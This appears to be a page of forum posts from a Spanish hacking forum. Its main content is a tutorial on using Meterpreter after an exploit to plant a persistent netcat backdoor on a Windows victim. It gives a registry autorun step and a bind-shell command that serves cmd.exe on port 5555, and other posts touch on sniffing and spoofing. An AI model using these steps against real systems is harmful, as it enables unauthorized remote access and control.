elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Arreglado, de nuevo, el registro del warzone (wargame) de EHN


  Mostrar Mensajes
Páginas: 1 ... 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 [39] 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55
381  Seguridad Informática / Hacking / Re: [Mini How-To] Usando Meterpreter en: 20 Noviembre 2009, 14:24 pm
viene con el metasploit, es un payload más  :¬¬
382  Seguridad Informática / Hacking / [Mini How-To] Usando Meterpreter en: 20 Noviembre 2009, 02:08 am
Bueno, en este mini-manual, simplemente quería ilustrar el potencial de este magnífico plug-in que nos ofrece la suite MetaSploit Framework.

El meterpreter o meta intérprete es una familia de plugins avanzados para utilizar sobre sistemas Windows comprometidos que tienen como característica fundamental que todo es cargado en la memoria del sistema sin crear ningún proceso adicional. Además aporta mucha flexibilidad, permitiendo mil y una funciones al alcance de un sólo comando, con lo que nos permite realizar los ataques haciendo algo menos de ruido.

Antes de ir a lo práctico, os quiero mostrar todas las posibilidades que nos ofrece esta genial herramienta:

Citar
Core Commands
=============

Command       Description
——-       ———–
?             Help menu
channel       Displays information about active channels
close         Closes a channel
exit          Terminate the meterpreter session
help          Help menu
interact      Interacts with a channel
irb           Drop into irb scripting mode
migrate       Migrate the server to another process
quit          Terminate the meterpreter session
read          Reads data from a channel
run           Executes a meterpreter script
use           Load a one or more meterpreter extensions
write         Writes data to a channel

Stdapi: File system Commands
============================

Command       Description
——-       ———–
cat           Read the contents of a file to the screen
cd            Change directory
download      Download a file or directory
edit          Edit a file
getlwd        Print local working directory
getwd         Print working directory
lcd           Change local working directory
lpwd          Print local working directory
ls            List files
mkdir         Make directory
pwd           Print working directory
rmdir         Remove directory
upload        Upload a file or directory

Stdapi: Networking Commands
===========================

Command       Description
——-       ———–
ipconfig      Display interfaces
portfwd       Forward a local port to a remote service
route         View and modify the routing table

Stdapi: System Commands
=======================

Command       Description
——-       ———–
execute       Execute a command
getpid        Get the current process identifier
getuid        Get the user that the server is running as
kill          Terminate a process
ps            List running processes
reboot        Reboots the remote computer
reg           Modify and interact with the remote registry
rev2self      Calls RevertToSelf() on the remote machine
shutdown      Shuts down the remote computer
sysinfo       Gets information about the remote system, such as OS

Stdapi: User interface Commands
===============================

Command       Description
——-       ———–
idletime      Returns the number of seconds the remote user has been idle
uictl         Control some of the user interface components

Priv: Password database Commands
================================

Command       Description
——-       ———–
hashdump      Dumps the contents of the SAM database

Priv: Timestomp Commands
========================

Command       Description
——-       ———–
timestomp     Manipulate file MACE attributes

Bueno, como ejemplo básico del uso de meterpreter, vamos a suponer que hemos encontrado una vulnerabilidad en un sistema Windows, y que con ayuda del Metasploit le cascamos el exploit y le indicamos que como payload nos devuelva una sesión con el meterpreter a través de una conexión directa a la víctima.

Una vez que estamos situados en este escenario, nuestra tarea va a ser crear un backdoor un tanto rudimentario (pero efectivo), vamos a subirle un netcat a la víctima, y creando adecuadamente una entrada en el registro, vamos a hacer que cada vez que se arranque el sistema se ejecute netcat y espere conexiones en el puerto 5555, de forma que en el momento en el que nos conectemos, nos devuelva un cmd.

Bueno, pues manos a la obra!

Una vez que tenemos nuestro flamante metasploit corriendo...



Y como hemos indicado, se ha conseguido explotar alguna vulnerabilidad en el sistema remoto y obtener una sesión de meterpreter, procedemos a subir el ejecutable del netcat a la víctima, más concretamente a la carpeta System32:


Una vez que está subido, el siguiente paso será insertar una clave en el registro para que el programa se ejecute automáticamente al iniciar el sistema, y comprobamos que la clave se haya añadido :



la imagen es un poco grande y no se ve todo el comando de netcat, que sería:
Código:
netcat.exe -L -d -p 5555 -e cmd.exe


Finalmente, esperamos a que el Sistema de la víctima se reinicie para comprobar si ha funcionado el backdoor...



Voilà!! Parece que todo ha funcionado, y el Sistema al reiniciarse ejecuta sin problemas el netcat.
Para comprobarlo, otra captura más del registro del Pc Víctima visto desde dentro, donde comprobamos que efectivamente todo se ha añadido correctamente:




Como veis, esto es simplemente la punta del iceberg, es un ejemplo muy básico, pero creo que a la vez muy descriptivo de lo que se puede llegar a hacer y la facilidad con la cual hacerlo...

Os insto a que le echeis un ojo a este magnífico plug-in, y a su gran lista de funcionalidades, sin duda es una herramienta que nos hará la vida un poco más fácil!

saludos
383  Seguridad Informática / Hacking / Re: dudas sobre "ataque modelo" en: 19 Noviembre 2009, 11:46 am
https://foro.elhacker.net/search.html

www.google.es
384  Seguridad Informática / Hacking / Re: Problemas para acceder a shell remota con Netcat. en: 18 Noviembre 2009, 22:53 pm
https://foro.elhacker.net/hacking_basico/nuestros_isp_capando_conexiones-t107493.0.html

este error es de hace tiempo, supongo que habrá alguna solución ahora... :-\

edit:

+info: http://fixunix.com/security/74705-netcat-problems.html

en google hay bastante gente con problemas similares...a mi nunca me ha pasado así que no te puedo decir más :S, si consigues solucionarlo postea ;)
385  Seguridad Informática / Hacking / Re: Acerca del uso de un sniffer en: 17 Noviembre 2009, 23:24 pm
es lo de siempre, entraríamos en falsificación de certificados o uso de herramientas tipo SSLStrip...

doy por cerrado el tema ya que se ha respondido a lo que se preguntaba, y lo que he puesto en la 1ª linea está más que discutido en varios hilos, así que si interesa, a buscar! :P
386  Seguridad Informática / Nivel Web / Re: Herramienta para modificar cabecera IP en: 17 Noviembre 2009, 21:58 pm
la Dirección IP se guarda en la capa de Red, osea en IP (protocolo de internet), modificarlo no es muy dificil, mira por ejemplo con Nemesis, el problema está en que si cambias la IP, nunca recibirás respuesta, ya que el Servidor mandará la respuesta justamente a la IP que hayas suplantado/cambiado, que no es la tuya...
387  Seguridad Informática / Hacking / Re: Acerca del uso de un sniffer en: 16 Noviembre 2009, 23:35 pm
una puntualización, un sniffer no envenenta, simplemente escucha y captura todo lo que pasa por la tarjeta de red (para lo que tiene que estar en modo promiscuo en una red segmentada, o tienes que hacer un MiM en una red conmutada, en este último caso será con ayuda de otro programa envenenes la tabla ARP de las víctimas)
388  Seguridad Informática / Hacking / Re: Acerca del uso de un sniffer en: 16 Noviembre 2009, 21:15 pm
Citar
si lo que preguntas es que si sólo sabiendo el usar y el pass de alguien que no esté en tu misma LAN, puedes sniffar el tráfico cuando chatea, pues no.
389  Programación / Bases de Datos / Re: Consulta SQL. en: 16 Noviembre 2009, 21:03 pm
no se, es la consulta que pidió hadess :
Citar
Como hacer que en una consulta me muestre los cursos que no estan en detalle.
, pregúntale a él :P
390  Programación / Bases de Datos / Re: Consulta SQL. en: 16 Noviembre 2009, 20:55 pm
Citar
Insertar Cita
disculpa novlucker, me podes explicar esto :?
Código

NOT IN (SELECT detalle.idcurso FROM detalle)

se hace una subconsulta (consulta dentro de otra), en la que se buscan todos los id's de la tabla detalle, y con ayuda del not lo "negamos", de forma que en palabras la consulta sería algo como:

Muéstrame todos los campos de la tabla curso, teniendo en cuenta que los que me muestres no tienen que tener un id igual al que hay en la tabla detalle
Páginas: 1 ... 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 [39] 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines